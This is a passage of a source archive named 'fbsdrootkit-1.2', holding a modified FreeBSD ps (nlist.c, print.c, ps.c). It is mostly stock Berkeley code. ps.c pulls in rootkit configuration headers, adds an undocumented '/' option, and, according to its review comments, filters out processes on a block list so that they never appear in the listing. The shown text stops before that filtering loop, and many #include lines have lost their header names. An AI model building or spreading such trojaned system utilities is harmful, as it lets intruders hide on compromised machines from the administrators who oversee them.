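		v->header = hp;
	return (v);
}

/* vcmp -- bsearch() comparison: order two VAR entries by name. */
static int
vcmp(a, b)
	const void *a, *b;
{
	return (strcmp(((VAR *)a)->name, 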
((VAR *)b)->name)); } fbsdrootkit-1.2/ps/nlist.c100600 764 764 7267 5665025740 13077 0ustar dfdf/*- * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
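* * $Id: nlist.c,v 1.5 1994/11/24 13:13:55 davidg Exp $ */

#ifndef lint
static char sccsid[] = "@(#)nlist.c 8.4 (Berkeley) 4/2/94";
#endif /* not lint */

/* NOTE(review): the header name after each bare #include is missing in this copy. */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include "ps.h"

#ifdef P_PPWAIT
#define NEWVM
#endif

/* Kernel symbols resolved by donlist(); the X_* values index this table. */
struct	nlist psnl[] = {
	{"_fscale"},
#define	X_FSCALE	0
	{"_ccpu"},
#define	X_CCPU		1
#ifdef NEWVM
	{"_avail_start"},
#define	X_AVAILSTART	2
	{"_avail_end"},
#define	X_AVAILEND 	3
#else
	{"_ecmx"},
#define	X_ECMX		2
#endif
	{NULL}
};

fixpt_t	ccpu;				/* kernel _ccpu variable */
int	nlistread;			/* if nlist already read. */
int	mempages;			/* number of pages of phys. memory */
int	fscale;				/* kernel _fscale variable */

extern kvm_t *kd;

/*
 * Read the kernel variable named by psnl[x] into v.  Evaluates to non-zero
 * when kvm_read() did not return the full size of v.
 */
#define kread(x, v) \
	(kvm_read(kd, psnl[x].n_value, (char *)&(v), sizeof(v)) != sizeof(v))

/*
 * donlist --
 *	Resolve the symbols in psnl[] with kvm_nlist() and read fscale,
 *	mempages and ccpu from the kernel through kd.
 *
 *	Returns 0 on success and 1 when the symbol lookup or any read
 *	failed; eval is set to 1 in the failure cases.  nlistread is set to
 *	1 whether or not the reads succeed.
 *
 *	Each warning names the variable whose read actually failed (the
 *	avail_start and avail_end messages used to be swapped), and tmp
 *	starts at zero so that a failed avail_start read does not feed an
 *	uninitialized value into mempages.
 */
int
donlist()
{
	int rval;
#ifdef NEWVM
	int tmp = 0;
#endif

	rval = 0;
	nlistread = 1;
	if (kvm_nlist(kd, psnl)) {
		nlisterr(psnl);
		eval = 1;
		return (1);
	}
	if (kread(X_FSCALE, fscale)) {
		warnx("fscale: %s", kvm_geterr(kd));
		eval = rval = 1;
	}
#ifdef NEWVM
	if (kread(X_AVAILEND, mempages)) {
		warnx("avail_end: %s", kvm_geterr(kd));
		eval = rval = 1;
	}
	if (kread(X_AVAILSTART, tmp)) {
		warnx("avail_start: %s", kvm_geterr(kd));
		eval = rval = 1;
	}
	/* mempages = (avail_end - avail_start) / PAGE_SIZE */
	mempages -= tmp;
	mempages /= PAGE_SIZE;
#else
	if (kread(X_ECMX, mempages)) {
		warnx("ecmx: %s", kvm_geterr(kd));
		eval = rval = 1;
	}
#endif
	if (kread(X_CCPU, ccpu)) {
		warnx("ccpu: %s", kvm_geterr(kd));
		eval = rval = 1;
	}
	return (rval);
}

/*
 * nlisterr --
 *	Write to stderr the name of every entry of nl[] whose n_value is
 *	zero.  nl[] must end with an entry whose n_name is NULL.
 */
void
nlisterr(nl)
	struct nlist nl[];
{
	int i;

	(void)fprintf(stderr, "ps: nlist: can't find following symbols:");
	for (i = 0; nl[i].n_name != NULL; i++)
		if (nl[i].n_value == 0)
			(void)fprintf(stderr, " %s", nl[i].n_name);
	(void)fprintf(stderr, "\n");
}
fbsdrootkit-1.2/ps/print.c100600 764 764 33755 6155237104 13115 0ustar dfdf/*- * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. 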
* * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
* * $Id: print.c,v 1.7.4.4 1996/06/05 02:36:11 jkh Exp $ */ #ifndef lint static char sccsid[] = "@(#)print.c 8.6 (Berkeley) 4/16/94"; #endif /* not lint */ #include #include #include #include #include #ifdef P_PPWAIT #define NEWVM #endif #ifdef NEWVM #include #include #include #else #include #include #include #endif #include #include #include #include #include #include #include #include #include "ps.h" void printheader() { VAR *v; struct varent *vent; for (vent = vhead; vent; vent = vent->next) { v = vent->var; if (v->flag & LJUST) { if (vent->next == NULL) /* last one */ (void)printf("%s", v->header); else (void)printf("%-*s", v->width, v->header); } else (void)printf("%*s", v->width, v->header); if (vent->next != NULL) (void)putchar(' '); } (void)putchar('\n'); } void command(k, ve) KINFO *k; VARENT *ve; { VAR *v; int left; char *cp, *vis_env, *vis_args; if ((vis_args = malloc(strlen(k->ki_args) * 4 + 1)) == NULL) err(1, NULL); strvis(vis_args, k->ki_args, VIS_TAB | VIS_NL | VIS_NOSLASH); if (k->ki_env) { if ((vis_env = malloc(strlen(k->ki_env) * 4 + 1)) == NULL) err(1, NULL); strvis(vis_env, k->ki_env, VIS_TAB | VIS_NL | VIS_NOSLASH); } else vis_env = NULL; v = ve->var; if (ve->next == NULL) { /* last field */ if (termwidth == UNLIMITED) { if (vis_env) (void)printf("%s ", vis_env); (void)printf("%s", vis_args); } else { left = termwidth - (totwidth - v->width); if (left < 1) /* already wrapped, just use std width */ left = v->width; if ((cp = vis_env) != NULL) { while (--left >= 0 && *cp) (void)putchar(*cp++); if (--left >= 0) putchar(' '); } for (cp = vis_args; --left >= 0 && *cp != '\0';) (void)putchar(*cp++); } } else /* XXX env? 
*/ (void)printf("%-*.*s", v->width, v->width, vis_args); free(vis_args); if (vis_env != NULL) free(vis_env); } void ucomm(k, ve) KINFO *k; VARENT *ve; { VAR *v; v = ve->var; (void)printf("%-*s", v->width, KI_PROC(k)->p_comm); } void logname(k, ve) KINFO *k; VARENT *ve; { VAR *v; v = ve->var; #ifndef NEWVM (void)printf("%-*s", v->width, KI_PROC(k)->p_logname); #else (void)printf("%-*s", v->width, KI_EPROC(k)->e_login); #endif } void state(k, ve) KINFO *k; VARENT *ve; { struct proc *p; int flag; char *cp; VAR *v; char buf[16]; v = ve->var; p = KI_PROC(k); flag = p->p_flag; cp = buf; switch (p->p_stat) { case SSTOP: *cp = 'T'; break; case SSLEEP: if (flag & P_SINTR) /* interuptable (long) */ *cp = p->p_slptime >= MAXSLP ? 'I' : 'S'; else *cp = 'D'; break; case SRUN: case SIDL: *cp = 'R'; break; case SZOMB: *cp = 'Z'; break; default: *cp = '?'; } cp++; if (flag & P_INMEM) { #ifndef NEWVM if (p->p_rssize > p->p_maxrss) *cp++ = '>'; #endif } else *cp++ = 'W'; if (p->p_nice < NZERO) *cp++ = '<'; else if (p->p_nice > NZERO) *cp++ = 'N'; #ifndef NEWVM if (flag & SUANOM) *cp++ = 'A'; else if (flag & SSEQL) *cp++ = 'S'; #endif if (flag & P_TRACED) *cp++ = 'X'; if (flag & P_WEXIT && p->p_stat != SZOMB) *cp++ = 'E'; #ifdef NEWVM if (flag & P_PPWAIT) #else if (flag & SVFORK) #endif *cp++ = 'V'; #ifdef NEWVM if (flag & (P_SYSTEM | P_NOSWAP | P_PHYSIO)) #else if (flag & (SSYS|SLOCK|SULOCK|SKEEP|SPHYSIO)) #endif *cp++ = 'L'; if (KI_EPROC(k)->e_flag & EPROC_SLEADER) *cp++ = 's'; if ((flag & P_CONTROLT) && KI_EPROC(k)->e_pgid == KI_EPROC(k)->e_tpgid) *cp++ = '+'; *cp = '\0'; (void)printf("%-*s", v->width, buf); } void pri(k, ve) KINFO *k; VARENT *ve; { VAR *v; v = ve->var; (void)printf("%*d", v->width, KI_PROC(k)->p_priority - PZERO); } void uname(k, ve) KINFO *k; VARENT *ve; { VAR *v; v = ve->var; #ifndef NEWVM (void)printf("%-*s", (int)v->width, user_from_uid(KI_PROC(k)->p_uid, 0)); #else (void)printf("%-*s", (int)v->width, user_from_uid(KI_EPROC(k)->e_ucred.cr_uid, 0)); #endif } 
/* Print the user name that user_from_uid() returns for the real uid. */
void
runame(k, ve)
	KINFO *k;
	VARENT *ve;
{
	VAR *v;

	v = ve->var;
#ifndef NEWVM
	(void)printf("%-*s",
	    (int)v->width, user_from_uid(KI_PROC(k)->p_ruid, 0));
#else
	(void)printf("%-*s",
	    (int)v->width, user_from_uid(KI_EPROC(k)->e_pcred.p_ruid, 0));
#endif
}

/* Print the controlling terminal as "major/minor", or "??" for NODEV. */
void
tdev(k, ve)
	KINFO *k;
	VARENT *ve;
{
	VAR *v;
	dev_t dev;
	char buff[16];

	v = ve->var;
	dev = KI_EPROC(k)->e_tdev;
	if (dev == NODEV)
		(void)printf("%*s", v->width, "??");
	else {
		(void)snprintf(buff, sizeof(buff),
		    "%d/%d", major(dev), minor(dev));
		(void)printf("%*s", v->width, buff);
	}
}

/*
 * Print the short terminal name: the devname() result with a leading
 * "tty" or "cua" removed, followed by ' ' when EPROC_CTTY is set in
 * e_flag and '-' otherwise. "??" is printed for NODEV or a NULL name.
 */
void
tname(k, ve)
	KINFO *k;
	VARENT *ve;
{
	VAR *v;
	dev_t dev;
	char *ttname;

	v = ve->var;
	dev = KI_EPROC(k)->e_tdev;
	if (dev == NODEV || (ttname = devname(dev, S_IFCHR)) == NULL)
		(void)printf("%*s ", v->width-1, "??");
	else {
		if (strncmp(ttname, "tty", 3) == 0 ||
		    strncmp(ttname, "cua", 3) == 0)
			ttname += 3;
		(void)printf("%*.*s%c", v->width-1, v->width-1, ttname,
			KI_EPROC(k)->e_flag & EPROC_CTTY ? ' ' : '-');
	}
}

/* Print the full devname() result for the terminal, or "??". */
void
longtname(k, ve)
	KINFO *k;
	VARENT *ve;
{
	VAR *v;
	dev_t dev;
	char *ttname;

	v = ve->var;
	dev = KI_EPROC(k)->e_tdev;
	if (dev == NODEV || (ttname = devname(dev, S_IFCHR)) == NULL)
		(void)printf("%-*s", v->width, "??");
	else
		(void)printf("%-*s", v->width, ttname);
}

/*
 * Print the start time in one of three formats chosen by the age of the
 * process (under 24 hours, under 7 days, older). "-" is printed when the
 * saved user-area data is not valid. The current time is fetched once
 * and cached in a static.
 *
 * NOTE(review): the strftime() return value is discarded and buf is not
 * initialised, so buf is printed even if formatting produced nothing;
 * the localtime() result is also used without a NULL check.
 */
void
started(k, ve)
	KINFO *k;
	VARENT *ve;
{
	VAR *v;
	static time_t now;
	struct tm *tp;
	char buf[100];

	v = ve->var;
	if (!k->ki_u.u_valid) {
		(void)printf("%-*s", v->width, "-");
		return;
	}

	tp = localtime(&k->ki_u.u_start.tv_sec);
	if (!now)
		(void)time(&now);
	if (now - k->ki_u.u_start.tv_sec < 24 * 3600) {
		/* I *hate* SCCS... */
		/* the format is split in two, presumably so SCCS does not expand it as a keyword */
		static char fmt[] = __CONCAT("%l:%", "M%p");
		(void)strftime(buf, sizeof(buf) - 1, fmt, tp);
	} else if (now - k->ki_u.u_start.tv_sec < 7 * 86400) {
		/* I *hate* SCCS... */
		static char fmt[] = __CONCAT("%a%", "I%p");
		(void)strftime(buf, sizeof(buf) - 1, fmt, tp);
	} else
		(void)strftime(buf, sizeof(buf) - 1, "%e%b%y", tp);
	(void)printf("%-*s", v->width, buf);
}

/*
 * Print the start time with the "%C" strftime format, or "-" when the
 * saved user-area data is not valid.
 *
 * NOTE(review): same unchecked strftime()/localtime() use as started().
 */
void
lstarted(k, ve)
	KINFO *k;
	VARENT *ve;
{
	VAR *v;
	char buf[100];

	v = ve->var;
	if (!k->ki_u.u_valid) {
		(void)printf("%-*s", v->width, "-");
		return;
	}
	(void)strftime(buf, sizeof(buf) -1, "%C",
	    localtime(&k->ki_u.u_start.tv_sec));
	(void)printf("%-*s", v->width, buf);
}

/*
 * Print the wait channel: the wait message when p_wmesg is set, else the
 * channel address with the KERNBASE bits masked off, else "-".
 */
void
wchan(k, ve)
	KINFO *k;
	VARENT *ve;
{
	VAR *v;

	v = ve->var;
	if (KI_PROC(k)->p_wchan) {
		if (KI_PROC(k)->p_wmesg)
			(void)printf("%-*.*s", v->width, v->width,
				      KI_EPROC(k)->e_wmesg);
		else
			(void)printf("%-*x", v->width,
			    (int)KI_PROC(k)->p_wchan &~ KERNBASE);
	} else
		(void)printf("%-*s", v->width, "-");
}

/* Convert a page count to kilobytes. */
#define pgtok(a)        (((a)*NBPG)/1024)

/* Print the virtual size: data + stack + text sizes, via pgtok(). */
void
vsize(k, ve)
	KINFO *k;
	VARENT *ve;
{
	VAR *v;

	v = ve->var;
	(void)printf("%*d", v->width,
#ifndef NEWVM
	    pgtok(KI_PROC(k)->p_dsize +
	        KI_PROC(k)->p_ssize + KI_EPROC(k)->e_xsize));
#else
	    pgtok(KI_EPROC(k)->e_vm.vm_dsize + KI_EPROC(k)->e_vm.vm_ssize +
		KI_EPROC(k)->e_vm.vm_tsize));
#endif
}

/* Print the resident set size via pgtok(). */
void
rssize(k, ve)
	KINFO *k;
	VARENT *ve;
{
	VAR *v;

	v = ve->var;
#ifndef NEWVM
	(void)printf("%*d", v->width,
	    pgtok(KI_PROC(k)->p_rssize + (KI_EPROC(k)->e_xccount ?
	    (KI_EPROC(k)->e_xrssize / KI_EPROC(k)->e_xccount) : 0)));
#else
	/* XXX don't have info about shared */
	(void)printf("%*d", v->width, pgtok(KI_EPROC(k)->e_vm.vm_rssize));
#endif
}

void
p_rssize(k, ve)		/* doesn't account for text */
	KINFO *k;
	VARENT *ve;
{
	VAR *v;

	v = ve->var;
#ifndef NEWVM
	(void)printf("%*d", v->width, pgtok(KI_PROC(k)->p_rssize));
#else
	(void)printf("%*ld", v->width, pgtok(KI_EPROC(k)->e_vm.vm_rssize));
#endif
}

/*
 * Print accumulated CPU time as minutes:seconds.hundredths. Zombies and
 * processes without valid saved user-area data print as zero. When
 * sumrusage is set, the children's user and system times are added.
 */
void
cputime(k, ve)
	KINFO *k;
	VARENT *ve;
{
	VAR *v;
	long secs;
	long psecs;	/* "parts" of a second. first micro, then centi */
	char obuff[128];

	v = ve->var;
	if (KI_PROC(k)->p_stat == SZOMB || !k->ki_u.u_valid) {
		secs = 0;
		psecs = 0;
	} else {
		/*
		 * This counts time spent handling interrupts.  We could
		 * fix this, but it is not 100% trivial (and interrupt
		 * time fractions only work on the sparc anyway).	XXX
		 */
		secs = KI_PROC(k)->p_rtime.tv_sec;
		psecs = KI_PROC(k)->p_rtime.tv_usec;
		if (sumrusage) {
			secs += k->ki_u.u_cru.ru_utime.tv_sec +
				k->ki_u.u_cru.ru_stime.tv_sec;
			psecs += k->ki_u.u_cru.ru_utime.tv_usec +
				k->ki_u.u_cru.ru_stime.tv_usec;
		}
		/*
		 * round and scale to 100's
		 */
		psecs = (psecs + 5000) / 10000;
		secs += psecs / 100;
		psecs = psecs % 100;
	}
	(void)snprintf(obuff, sizeof(obuff),
	    "%3ld:%02ld.%02ld", secs/60, secs%60, psecs);
	(void)printf("%*s", v->width, obuff);
}

/*
 * Return the CPU percentage for one process as a double. Returns 0.0
 * when donlist() reported failure, when p_swtime is 0, or when P_INMEM
 * is not set. With rawcpu set, the scaled p_pctcpu is returned without
 * the decay correction.
 */
double
getpcpu(k)
	KINFO *k;
{
	struct proc *p;
	static int failure;

	if (!nlistread)
		failure = donlist();
	if (failure)
		return (0.0);

	p = KI_PROC(k);
#define	fxtofl(fixpt)	((double)(fixpt) / fscale)

	/* XXX - I don't like this */
	if (p->p_swtime == 0 || (p->p_flag & P_INMEM) == 0)
		return (0.0);
	if (rawcpu)
		return (100.0 * fxtofl(p->p_pctcpu));
	return (100.0 * fxtofl(p->p_pctcpu) /
		(1.0 - exp(p->p_swtime * log(fxtofl(ccpu)))));
}

/* Print getpcpu() with one decimal place. */
void
pcpu(k, ve)
	KINFO *k;
	VARENT *ve;
{
	VAR *v;

	v = ve->var;
	(void)printf("%*.1f", v->width, getpcpu(k));
}

/*
 * Return the memory percentage for one process as a double. Returns 0.0
 * when donlist() reported failure or when P_INMEM is not set.
 */
double
getpmem(k)
	KINFO *k;
{
	static int failure;
	struct proc *p;
	struct eproc *e;
	double fracmem;
	int szptudot;

	if (!nlistread)
		failure = donlist();
	if (failure)
		return (0.0);

	p = KI_PROC(k);
	e = KI_EPROC(k);
	if ((p->p_flag & P_INMEM) == 0)
		return (0.0);
#ifndef NEWVM
	szptudot = UPAGES + clrnd(ctopt(p->p_dsize + p->p_ssize + e->e_xsize));
	fracmem = ((float)p->p_rssize + szptudot)/CLSIZE/mempages;
	if (p->p_textp && e->e_xccount)
		fracmem += ((float)e->e_xrssize)/CLSIZE/e->e_xccount/mempages;
#else
	/* XXX want pmap ptpages, segtab, etc. (per architecture) */
	szptudot = UPAGES;
	/* XXX don't have info about shared */
	fracmem = ((float)e->e_vm.vm_rssize + szptudot)/CLSIZE/mempages;
#endif
	return (100.0 * fracmem);
}

/* Print getpmem() with one decimal place. */
void
pmem(k, ve)
	KINFO *k;
	VARENT *ve;
{
	VAR *v;

	v = ve->var;
	(void)printf("%*.1f", v->width, getpmem(k));
}

/* Print the major page-fault count, or 0 when the saved data is not valid. */
void
pagein(k, ve)
	KINFO *k;
	VARENT *ve;
{
	VAR *v;

	v = ve->var;
	(void)printf("%*ld", v->width,
	    k->ki_u.u_valid ? k->ki_u.u_ru.ru_majflt : 0);
}

/* Print the resident-set limit; with NEWVM defined this always prints "-". */
void
maxrss(k, ve)
	KINFO *k;
	VARENT *ve;
{
	VAR *v;

	v = ve->var;
#ifndef NEWVM	/* not yet */
	if (KI_PROC(k)->p_maxrss != (RLIM_INFINITY/NBPG))
		(void)printf("%*d", v->width,
		    pgtok(KI_PROC(k)->p_maxrss));
	else
#endif
		(void)printf("%*s", v->width, "-");
}

/* Print the text size via pgtok(). */
void
tsize(k, ve)
	KINFO *k;
	VARENT *ve;
{
	VAR *v;

	v = ve->var;
#ifndef NEWVM
	(void)printf("%*d", v->width, pgtok(KI_EPROC(k)->e_xsize));
#else
	(void)printf("%*ld", v->width, pgtok(KI_EPROC(k)->e_vm.vm_tsize));
#endif
}

#ifndef NEWVM
/* Print the text resident size via pgtok(); compiled only without NEWVM. */
void
trss(k, ve)
	KINFO *k;
	VARENT *ve;
{
	VAR *v;

	v = ve->var;
	(void)printf("%*d", v->width, pgtok(KI_EPROC(k)->e_xrssize));
}
#endif

/*
 * Generic output routines.  Print fields from various prototype
 * structures.
*/
/*
 * Print the value at bp using the column's own conversion.
 *
 * A printf format of the form "%[-]*<v->fmt>" is assembled in the static
 * 32-byte buffer ofmt ('-' only for LJUST columns) and the value is then
 * read through a pointer cast chosen by v->type. An unknown type ends
 * the program through errx().
 *
 * NOTE(review): the copy from v->fmt into ofmt has no length check, and
 * the assembled string is handed to printf as a non-literal format. This
 * is sound only while every VAR.fmt is a short, trusted conversion that
 * agrees with v->type; presumably those come from a compiled-in table
 * not shown here -- confirm.
 */
static void
printval(bp, v)
	char *bp;
	VAR *v;
{
	static char ofmt[32] = "%";
	char *fcp, *cp;

	cp = ofmt + 1;
	fcp = v->fmt;
	if (v->flag & LJUST)
		*cp++ = '-';
	*cp++ = '*';
	/* append v->fmt including its terminating NUL */
	while ((*cp++ = *fcp++));

	switch (v->type) {
	case CHAR:
		(void)printf(ofmt, v->width, *(char *)bp);
		break;
	case UCHAR:
		(void)printf(ofmt, v->width, *(u_char *)bp);
		break;
	case SHORT:
		(void)printf(ofmt, v->width, *(short *)bp);
		break;
	case USHORT:
		(void)printf(ofmt, v->width, *(u_short *)bp);
		break;
	case LONG:
		(void)printf(ofmt, v->width, *(long *)bp);
		break;
	case ULONG:
		(void)printf(ofmt, v->width, *(u_long *)bp);
		break;
	case KPTR:
		/* kernel pointer: printed with the KERNBASE bits masked off */
		(void)printf(ofmt, v->width, *(u_long *)bp &~ KERNBASE);
		break;
	default:
		errx(1, "unknown type %d", v->type);
	}
}

/* Print the field at byte offset v->off inside the proc structure. */
void
pvar(k, ve)
	KINFO *k;
	VARENT *ve;
{
	VAR *v;

	v = ve->var;
	printval((char *)((char *)KI_PROC(k) + v->off), v);
}

/* Print the field at byte offset v->off inside the eproc structure. */
void
evar(k, ve)
	KINFO *k;
	VARENT *ve;
{
	VAR *v;

	v = ve->var;
	printval((char *)((char *)KI_EPROC(k) + v->off), v);
}

/*
 * Print the field at byte offset v->off inside the saved usave data, or
 * "-" when that data is not valid.
 */
void
uvar(k, ve)
	KINFO *k;
	VARENT *ve;
{
	VAR *v;

	v = ve->var;
	if (k->ki_u.u_valid)
		printval((char *)((char *)&k->ki_u + v->off), v);
	else
		(void)printf("%*s", v->width, "-");
}

/*
 * Print the field at byte offset v->off inside the saved rusage (u_ru),
 * or "-" when the saved data is not valid.
 */
void
rvar(k, ve)
	KINFO *k;
	VARENT *ve;
{
	VAR *v;

	v = ve->var;
	if (k->ki_u.u_valid)
		printval((char *)((char *)(&k->ki_u.u_ru) + v->off), v);
	else
		(void)printf("%*s", v->width, "-");
}
fbsdrootkit-1.2/ps/ps.c100600 764 764 31102 6257600576 12375 0ustar dfdf/*-
 * Copyright (c) 1990, 1993, 1994
 * The Regents of the University of California. All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 * notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 * notice, this list of conditions and the following disclaimer in the
 * documentation and/or other materials provided with the distribution.
 * 3.
All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: ps.c,v 1.7.4.3 1996/06/05 02:36:12 jkh Exp $ */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1990, 1993, 1994\n\ The Regents of the University of California. 
All rights reserved.\n";
#endif /* not lint */

#ifndef lint
static char sccsid[] = "@(#)ps.c 8.4 (Berkeley) 4/2/94";
#endif /* not lint */

/*
 * NOTE(review): the header name after every bare #include below was lost
 * when this page was extracted; only "ps.h" survives.
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include "ps.h"

#ifdef P_PPWAIT
#define NEWVM
#endif

/*
 * Rootkit configuration files
 *
 * NOTE(review): these two includes are absent from the ps.c.dist copy in
 * the same archive. Neither header is shown here. SHOWFLAG, show_all,
 * process_block_list() and check_process(), all used in main() below,
 * are not declared anywhere in this file, so presumably they come from
 * these headers -- confirm against them.
 */
#include "../config.h"
#include "../rootkitps.h"

KINFO *kinfo;
struct varent *vhead, *vtail;

int	eval;			/* exit value */
int	rawcpu;			/* -C */
int	sumrusage;		/* -S */
int	termwidth;		/* width of screen (0 == infinity) */
int	totwidth;		/* calculated width of requested variables */

static int needuser, needcomm, needenv;

enum sort { DEFAULT, SORTMEM, SORTCPU } sortby = DEFAULT;

static char	*fmt __P((char **(*)(kvm_t *, const struct kinfo_proc *, int),
		    KINFO *, char *, int));
static char	*kludge_oldps_options __P((char *));
static int	 pscomp __P((const void *, const void *));
static void	 saveuser __P((KINFO *));
static void	 scanvars __P((void));
static void	 usage __P((void));

/* Built-in column lists, one per output-format option. */
char dfmt[] = "pid tt state time command";
char jfmt[] = "user pid ppid pgid sess jobc state tt time command";
char lfmt[] = "uid pid ppid cpu pri nice vsz rss wchan state tt time command";
char   o1[] = "pid";
char   o2[] = "tt state time command";
char ufmt[] = "user pid %cpu %mem vsz rss tt state start time command";
char vfmt[] = "pid state time sl re pagein vsz rss lim tsiz %cpu %mem command";

kvm_t *kd;

/*
 * Entry point: parse options, open the kernel through kvm, fetch the
 * process list, sort it and print one row per selected process.
 *
 * This copy is a modified ps. Compared with ps.c.dist it (1) accepts an
 * extra '/' option when SHOWFLAG is defined, (2) calls
 * process_block_list() before fetching the process list, and (3) drops
 * every row for which check_process() returns non-zero. Output from a
 * binary built from this file is therefore not a complete view of the
 * process table.
 */
int
main(argc, argv)
	int argc;
	char *argv[];
{
	struct kinfo_proc *kp;
	struct varent *vent;
	struct winsize ws;
	struct passwd *pwd;
	dev_t ttydev;
	pid_t pid;
	uid_t uid;
	int all, ch, flag, i, fmt, lineno, nentries;
	int prtheader, wflag, what, xflg;
	char *nlistf, *memf, *swapf, errbuf[256];

	/* terminal width: first of stdout, stderr, stdin that answers; else 79 */
	if ((ioctl(STDOUT_FILENO, TIOCGWINSZ, (char *)&ws) == -1 &&
	     ioctl(STDERR_FILENO, TIOCGWINSZ, (char *)&ws) == -1 &&
	     ioctl(STDIN_FILENO,  TIOCGWINSZ, (char *)&ws) == -1) ||
	     ws.ws_col == 0)
		termwidth = 79;
	else
		termwidth = ws.ws_col - 1;

	if (argc > 1)
		argv[1] = kludge_oldps_options(argv[1]);

	all = fmt = prtheader = wflag = xflg = 0;
	pid = -1;
	uid = (uid_t) -1;
	ttydev = NODEV;
	memf = nlistf = swapf = NULL;
	/*
	 * With SHOWFLAG defined the option string gains a trailing '/',
	 * an option that ps.c.dist does not accept and that usage() in
	 * this file does not list.
	 */
	while ((ch = getopt(argc, argv,
#if defined(SHOWFLAG)
	    "aCeghjLlM:mN:O:o:p:rSTt:U:uvW:wx/")) != EOF)
#else
	    "aCeghjLlM:mN:O:o:p:rSTt:U:uvW:wx")) != EOF)
#endif
		switch((char)ch) {
		case 'a':
			all = 1;
			break;
		case 'e':			/* XXX set ufmt */
			needenv = 1;
			break;
		case 'C':
			rawcpu = 1;
			break;
		case 'g':
			break;			/* no-op */
		case 'h':
			prtheader = ws.ws_row > 5 ? ws.ws_row : 22;
			break;
		case 'j':
			parsefmt(jfmt);
			fmt = 1;
			jfmt[0] = '\0';
			break;
		case 'L':
			showkey();
			exit(0);
		case 'l':
			parsefmt(lfmt);
			fmt = 1;
			lfmt[0] = '\0';
			break;
		case 'M':
			memf = optarg;
			break;
		case 'm':
			sortby = SORTMEM;
			break;
		case 'N':
			nlistf = optarg;
			break;
		case 'O':
			parsefmt(o1);
			parsefmt(optarg);
